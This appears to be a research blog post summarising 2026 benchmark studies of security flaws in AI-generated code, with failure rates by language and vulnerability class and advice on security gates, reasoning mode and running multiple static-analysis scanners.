Two Years of AI Progress. Security Rate: Still 55%.
Veracode tested 100+ AI models. 45% introduce known security flaws — identical to 2024. The security rate hasn't moved in two years.
Published by GitIntel Research
TLDR
- • Veracode tested 100+ AI models: 55% security pass rate — unchanged since 2024
- • Java's security failure rate sits at 72%, the worst of any mainstream language
- • Reasoning models (extended chain-of-thought) reach 70–72% pass rates — the only category that moved the needle
- • AI-generated code is 2.74x more likely to contain XSS vulnerabilities than human-written code
- • The dataflow analysis problem — tracking tainted input across functions — remains unsolved by every model tested
In 45% of code generation tasks, the model introduces a known security flaw. That number comes from Veracode's Spring 2026 GenAI Code Security Report, which tested over 100 AI models against a standardized set of coding tasks and ran the output through static analysis. The result: a 55% security pass rate, identical to Veracode's 2024 baseline within statistical noise.
Two years of model scaling, RLHF tuning, and architectural improvements. Trillions of training tokens. Hundreds of billions of dollars in GPU infrastructure. The security rate didn't move.
The Data: Five Findings That Matter
1. The 55% Line Is a Ceiling, Not a Floor
Veracode has run this benchmark since 2024, deliberately testing what models produce "out of the box" without security-specific prompting. The methodology matters: this measures default behavior, which is what most developers actually encounter. Across all models and all tasks, the pass rate has hovered between 45% and 55% for two consecutive years.
Model size doesn't fix it. Veracode's data shows 20B-parameter models at ~52% and 400B-parameter models at ~56%. A 4-percentage-point spread across a 20x increase in model size. The security gap isn't a scale problem.
2. Java Is Regressing
Java stands alone with a 72% security failure rate. Python, C#, and JavaScript cluster between 38% and 45%. The gap is widening, not closing.
The explanation is structural. Java security patterns are verbose by design: prepared statements, input validation chains, output encoding across multiple layers. These patterns require deliberate, multi-step construction. AI models optimize for brevity and functional correctness. Java security is the opposite of brief.
Veracode's analysis points to a more specific cause: models are over-trained on legacy Java code. Millions of Stack Overflow answers and GitHub repositories contain pre-2015 Java patterns that were standard practice before modern security frameworks existed. The models default to what they learned most of, which happens to be insecure.
A separate study from AppSec Santa testing 6 models across 89 prompts confirmed the language effect from a different angle: JavaScript code had consistently higher vulnerability rates than Python across 5 of 6 models tested. GPT-5.2 showed the largest gap at 11.4% (Python) vs. 26.7% (JavaScript). The only model that bucked the trend was Claude Opus 4.6, which performed worse in Python (31.8%) than JavaScript (26.7%).
3. Reasoning Models Are the One Bright Spot
Models with extended reasoning — step-by-step chain-of-thought processing before generating output — reach 70–72% security pass rates. That's 15+ percentage points above the baseline. GPT-5 with extended reasoning enabled is the clearest example in Veracode's dataset.
The mechanism is intuitive: reasoning steps function as an internal code review. The model considers security implications before committing to a code pattern, increasing the chance of catching insecure constructs before they reach output. Without reasoning, models default to the shortest path to functional code, and security gets optimized away.
But 70–72% is still a 28–30% failure rate. Nearly one in three code snippets from the best-performing category still contains a known vulnerability. Better than coinflip odds, but not close to production-safe.
4. The Specific Failures Haven't Changed Either
The vulnerability classes that AI models fail on are the same ones they failed on in 2024. These aren't obscure edge cases. They're OWASP Top 10 staples, documented for decades:
| Vulnerability | AI Failure Rate | Source | | --- | --- | --- | | Cross-Site Scripting (CWE-80) | 86% | Veracode / Georgetown CSET | | Log Injection (CWE-117) | 88% | Veracode / Georgetown CSET | | SSRF (CWE-918) | Highest count (32 findings) | AppSec Santa 2026 | | Path Traversal (CWE-22) | 12 findings across 534 samples | AppSec Santa 2026 | | SQL Injection (CWE-89) | 47% | Georgetown CSET |
The AppSec Santa study ran 534 code samples across 6 LLMs and found injection-class weaknesses accounted for 37.1% of all confirmed vulnerabilities (65 of 175 total findings). SSRF alone produced 32 findings — the single most common vulnerability type.
Compared to human-written code, Veracode's data shows AI output is 2.74x more likely to contain XSS vulnerabilities, 1.91x more likely to have insecure object references, and 1.88x more likely to ship with improper password handling.
5. The Dataflow Problem Is Unsolved
This is the finding that explains the stagnation. Properly securing user input requires tracking data as it flows through function calls, variable assignments, transformation functions, and eventually reaches a sink (a database query, an HTML template, a system command). That's dataflow analysis, and no LLM has solved it.
Current transformer architectures aren't built for persistent state tracking across code spans. A user input that enters on line 12, gets assigned to a variable on line 15, passes through a transformation on line 23, and reaches an SQL query on line 47 requires maintaining a mental model of taint propagation that spans dozens of lines. Models can sometimes catch it in trivial cases (input goes directly to query on the next line). They consistently miss it when the flow crosses function boundaries or involves intermediate variables.
Veracode's data backs this up with a specific pattern: SQL injection and cryptographic algorithms are areas where models are performing well and improving. Both involve localized patterns — the vulnerability and the fix exist in close proximity. XSS and log injection, which require cross-function dataflow awareness, are getting worse. The models are learning local patterns. They're not learning global flow.
What It Means: The Security Ceiling Problem
We covered the divergence between syntax pass rates (95%) and security pass rates (55%) two weeks ago. The Spring 2026 data turns that observation into a confirmed trend line.
The implications are different depending on where you sit:
For individual developers: The 55% rate means you should treat every AI-generated code block as unreviewed third-party code. Not because AI tools are bad, but because their failure mode is invisible. The code compiles, passes tests, and does what you asked. The vulnerability is in what it didn't do — sanitize an input, validate a boundary, restrict a permission.
For engineering leaders: The language-specific data changes how you allocate review resources. If your stack is Java-heavy and your team uses AI coding tools, you're operating at a 72% failure rate. That's not an argument to ban AI tools. It's an argument to build language-specific security gates that run automatically on every AI-attributed commit.
For security teams: The reasoning model finding suggests an immediate mitigation. For security-sensitive code paths, requiring extended reasoning mode (where available) shifts the baseline from 55% to 70%+. It's not sufficient on its own, but it's the cheapest improvement available today.
The developer trust data tells us that 97% of developers already don't fully trust AI output. The problem isn't awareness. It's workflow: AI tools are optimized for speed, and code review pipelines haven't caught up with the volume increase.
The Counter-Argument: These Benchmarks Miss the Real Workflow
The strongest objection to the 55% number is methodological. Veracode tests raw, unprompted output. No developer uses AI tools that way in practice. Real workflows involve:
- Security-specific system prompts baked into tool configuration
- Follow-up prompts asking the model to review its own output for vulnerabilities
- SAST tools running in CI that catch issues before merge
- Human review of generated code before it ships
This is a fair criticism. The BaxBench study found that when models are explicitly told to avoid known, specific vulnerabilities, pass rates jump from 56% to 69% for the best-performing model (Claude Opus 4.5 Thinking). Security prompting works.
But there are two problems with dismissing the baseline number. First, most developers don't use security-specific prompting. Veracode's methodology reflects what the average developer experiences, which is the relevant risk surface for organizations. Second, even with prompting, the best result in BaxBench was 69%. That's a 31% failure rate under optimal conditions. The ceiling moves, but it doesn't move far.
The AppSec Santa study added another dimension: 78.3% of vulnerabilities were detected by only a single SAST tool out of the five used. Your CI pipeline's single scanner is likely missing the majority of issues. Multi-tool coverage isn't optional anymore.
What to Do About It
1. Add Security Gates Per Language, Not Per Tool
The data is clear: vulnerability rates vary more by language than by model. Java at 72% and Python at 38% require different review thresholds. Configure your SAST pipeline to apply stricter rules to AI-generated Java code. Most CI systems support per-language rule configurations. Use them.
If you don't know which commits are AI-generated, that's the first problem to solve. Attribution tools (including GitIntel's Co-Authored-By trailer detection) give you a per-file breakdown. You can't apply risk-appropriate review without knowing the risk source.
2. Require Reasoning Mode for Security-Sensitive Paths
The 15-percentage-point improvement from extended reasoning is the single largest effect in Veracode's dataset. For authentication flows, payment processing, data access layers, and API endpoint handlers, configure your AI tools to use reasoning/chain-of-thought mode by default. The latency cost is real (2–5x slower generation). The security improvement justifies it for code that handles user data or system permissions.
3. Run Multiple SAST Scanners
The AppSec Santa finding that 78.3% of vulnerabilities were caught by only one of five tools should change how you think about static analysis. A single scanner gives you partial coverage. Running two or three complementary tools (e.g., Semgrep + CodeQL + a language-specific linter) catches the overlapping blind spots. The marginal cost of additional scanners in CI is small compared to the cost of a shipped vulnerability.
This isn't new advice for security teams, but the AI code volume makes it urgent. When AI tools drive a 98% increase in PRs, single-scanner coverage that was adequate for human-written code becomes insufficient for the expanded output.
The Uncomfortable Conclusion
The AI industry has spent two years making models that write code faster, more fluently, and with fewer syntax errors. None of that effort transferred to security. The 55% line held because the problem isn't about model capability — models know about XSS, SQL injection, and SSRF. It's about generation priorities. Without explicit security pressure, models optimize for what their training data rewards: code that compiles and runs correctly.
Until model architectures solve the dataflow analysis problem, or until training explicitly penalizes insecure patterns with the same weight as syntax errors, the 55% line will hold. Plan your workflows accordingly.
Sources
- Veracode Spring 2026 GenAI Code Security Report — primary dataset, 100+ models, 55% pass rate baseline
- AppSec Santa: AI Code Security Study 2026 — 6 LLMs, 534 samples, 89 prompts, OWASP Top 10 mapping
- AI Vyuh: Why 53% of AI-Generated Code Ships with Vulnerabilities — consolidated vulnerability statistics and language breakdowns
- Georgetown CSET: Cybersecurity Risks of AI-Generated Code (2024) — XSS 86%, log injection 88%, SQL injection 47% failure rates
- BaxBench / ArXiv: Guiding AI to Fix Its Own Flaws — security prompting improves pass rates from 56% to 69%
- Veracode October 2025 GenAI Code Security Report — 2024–2025 baseline comparison data
- Dark Reading: As Coders Adopt AI Agents, Security Pitfalls Lurk in 2026 — enterprise adoption and agent-specific security risks